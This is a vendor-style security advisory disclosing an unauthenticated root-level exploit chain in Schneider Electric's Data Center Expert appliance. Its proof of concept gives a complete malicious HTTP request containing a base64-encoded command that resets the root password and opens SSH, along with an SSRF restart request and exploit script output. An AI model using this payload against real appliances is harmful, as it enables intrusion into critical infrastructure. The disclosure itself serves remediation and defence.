Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution

Vulnerability Description

The Data Center Expert (“DCE”) appliance lacks authorization controls and allows anyone to masquerade as a NetBotz camera. A path traversal vulnerability enables an attacker to create a malicious folder name capable of injecting arguments into specific shell commands during application boot. By leveraging a separate server-side request forgery (SSRF) vulnerability, an attacker can chain these two issues to obtain a root shell from a completely unauthenticated perspective.

Technical Description

APC NetBotz devices can be configured to report information to the Data Center Expert appliance via the DCE web application. This information contains various metrics, device alerts, and photographs.

The /botpost/surveillance HTTP route enables devices to upload images via a multipart POST request. This route does not require authentication.

When an image is uploaded, the first parameter in the POST body is loosely parsed as XML. This XML contains the variable nbCameraUid which is used to construct a folder name that is later created on the DCE filesystem. No input validation is done for nbCameraUid, enabling an unauthenticated attacker to abuse dot-segments (../) and write a folder with an arbitrary name anywhere on the DCE filesystem.

This behavior is dangerous, as several shell scripts exist on the appliance that leverage globbing to build commands that are later executed. For example, the nbfunctions script uses the following snippet to build the ISXC_CLASSPATH variable:

    for i in "$NBC_HOME"/tomcat/lib/*.jar; do
        ISXC_CLASSPATH="${ISXC_CLASSPATH}:${i}"
    done"

This shell script central.sh uses the ISXC_CLASSPATH varible as an argument when starting the Tomcat web server after a reboot:

    "$JAVA_HOME"/bin/java -server -Dprocess.name=isxc -Djava.awt.headless=true \
            $JMEM_OPTS $JGC $JMISC_OPTS ${DEBUG_OPTS:+"$DEBUG_OPTS"} $JMX_OPTS $PROFILE_OPTS \
            -DMAC_ADDRESS="$MAC_ADDRESS" -DNBC_HOME="$NBC_HOME" -Duser.timezone="$NBC_TIMEZONE" \
            -Duser.language="$NBC_LANG" -Duser.country="$NBC_COUNTRY" \
            -Dorg.apache.cxf.Logger=org.apache.cxf.common.logging.Log4jLogger \
            -Dorg.restlet.engine.loggerFacadeClass=org.restlet.ext.slf4j.Slf4jLoggerFacade \
            -cp $ISXC_CLASSPATH com.netbotz.server.Main

Since globbing does not differentiate between folders and files, it is possible to inject command-line arguments into the java invocation as long as the folder name ends with the string .jar.

To exploit this behavior, an attacker can inject the -Xms1m, -Xmx2m, and XX:OnOutOfMemoryError arguments, which severely limit the total memory allocated for the java runtime. The value of the XX:OnOutOfMemoryError argument will be executed as an additional shell command whenever this limited memory is exhausted.

Mitigation and Remediation Recommendation

Version 9.0 of EcoStruxure IT Data Center Expert includes fixes for these vulnerabilities and is available upon request from Schneider Electric’s Customer Care Center. Refer to https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf.

Credit

This vulnerability was discovered by Jaggar Henry and Jim Becher of KoreLogic, Inc.

Proof of Concept

As a proof-of-concept, the following HTTP request can be sent to the DCE appliance:

    POST /botpost/surveillance HTTP/1.1
    Host: victim.com
    Content-Length: 1010
    Content-Type: multipart/form-data; boundary=09b3621e3cb4509abb3722922089bc54

    --09b3621e3cb4509abb3722922089bc54
    Content-Disposition: form-data; name="foo"; filename=""
    Content-Type: application/xml

    <data>
        somePrefix
        timestamp="1627896543210"
        someMiddleData
        nbSerialNum<string-val>00:00:00:00:00:00<
        someMiddleData
        <variable varid="/../../../../../../../../../usr/local/netbotz/nbc/tomcat/lib/zzz -Xms1m -Xmx2m -XX:-OmitStackTraceInFastThrow -XX:OnOutOfMemoryError=echo${IFS}ZWNobyByb290OmtvcmVsb2dpYyB8IGNocGFzc3dkOyBzeXN0ZW1jdGwgc3RhcnQgc3NoZDsgaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIgLWogQUNDRVBU|base64$IFS-d|bash -Dfoo=bar.jar" classpath="/nbCameraUid1337"/>
        someMiddleData
        <variable varid="somethingElse" classpath="/nbEnclosureEnc1337"/>
        someSuffix
    </data>
    --09b3621e3cb4509abb3722922089bc54
    Content-Disposition: form-data; name="bar"; filename="korelogic.jpeg"
    Content-Type: image/jpeg

    z
    --09b3621e3cb4509abb3722922089bc54--

This will create a maliciously named folder in the /usr/local/netbotz/nbc/tomcat/lib/ directory:

    [root@dce ~]# ls /usr/local/netbotz/nbc/tomcat/lib/
     catalina.jar
     catalina-optional.jar
     commons-modeler-2.0.1.jar
     jsp-api.jar
     naming-factory.jar
     naming-resources.jar
     servlet-api.jar
     tomcat-ajp.jar
     tomcat-coyote.jar
     tomcat-http.jar
     tomcat-util.jar
    'zzz -Xms1m -Xmx2m -XX:-OmitStackTraceInFastThrow -XX:OnOutOfMemoryError=echo${IFS}ZWNobyByb290OmtvcmVsb2dpYyB8IGNocGFzc3dkOyBzeXN0ZW1jdGwgc3RhcnQgc3NoZDsgaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIgLWogQUNDRVBU|base64$IFS-d|bash -Dfoo=bar.jar'

When the Tomcat server reboots (either during a system upgrade or user initiated), the folder name is globbed and successfully injects arguments into the java invocation:

    [root@dce ~]# ps aux | grep tomcat
    root       73359  0.0  0.1 7384952 37052 ?       Sl   02:26   0:00 /etc/alternatives/jre/bin/java -cp :/usr/local/netbotz/nbc/jars/activation-1.1.jar:...:/usr/local/netbotz/nbc/tomcat/lib/tomcat-util.jar:/usr/local/netbotz/nbc/tomcat/lib/zzz -Xms1m -Xmx2m -XX:-OmitStackTraceInFastThrow -XX:OnOutOfMemoryError=echo${IFS}ZWNobyByb290OmtvcmVsb2dpYyB8IGNocGFzc3dkOyBzeXN0ZW1jdGwgc3RhcnQgc3NoZDsgaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIgLWogQUNDRVBU|base64$IFS-d|bash -Dfoo=bar.jar com.netbotz.server.tools.NBVars -g nbc.timezone

Due to the injected Xms and Xmx flags, an OutOfMemory error is thrown, and the following shell commands are executed (after being base64 decoded):

    echo root:korelogic | chpasswd; systemctl start sshd; iptables -I INPUT -p tcp --dport 22 -j ACCEPT

This effectively changes the “root” password to the string “korelogic”, enables SSH, and modifies the firewall rules to allow access to port 22 (TCP), enabling an attacker to SSH into the appliance.

    [goon@security struxureware]$ ssh -t root@192.168.2.90 id
    root@192.168.2.90's password:
    uid=0(root) gid=0(root) groups=0(root)
    Connection to 192.168.2.90 closed.

When port 80 is enabled, an attacker can leverage a separate server-side request forgery (SSRF) vulnerability (CVE-2025-50125/KL-001-2025-011) in the /plugins route and force a restart of the Tomcat server by sending a malformed HTTP request. Take for example the following HTTP request:

    rnmf /plugins HTTP/1.1
    Host: 127.0.0.1:7613
    Connection: keep-alive

The DCE web application unsafely proxies this request to a Java service only accessible via the loopback interface. The following snippet is from the decompiled JAR responsible for this service:

    while (true) {
        final InetAddress local = InetAddress.getByName("127.0.0.1");
        final ServerSocket server = new ServerSocket(7613, 5, local);
        final Socket connect = server.accept();
        this.logger.debug((Object)"Received socket connection...");
        final BufferedReader in = new BufferedReader(new InputStreamReader(connect.getInputStream()));
        String val = in.readLine();
        if (val == null) {
            val = "";
        }
        final boolean doReboot = val.startsWith("rnmf");

The code indicates that when a stream of data begins with the ASCII characters “rnmf” it is interpreted as a “reboot” instruction, and subsequently stops and starts the Tomcat server.

KoreLogic created a proof-of-concept script named unauth2shell.py that leverages these two vulnerabilities to obtain a shell as the “root” user from a completely unauthenticated perspective.

    [attacker@box]$ python unauth2shell.py
    [~] Creating malicious folder...
    [+] Created malicious folder
    [~] Restarting application...
    [+] Restart successfully initiated
    [~] Polling...
    [~] Polling...
    [~] Polling...
    [~] Polling...
    [~] Polling...
    [+] Restart successful

    [root@dce ~]# id
    uid=0(root) gid=0(root) groups=0(root)

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy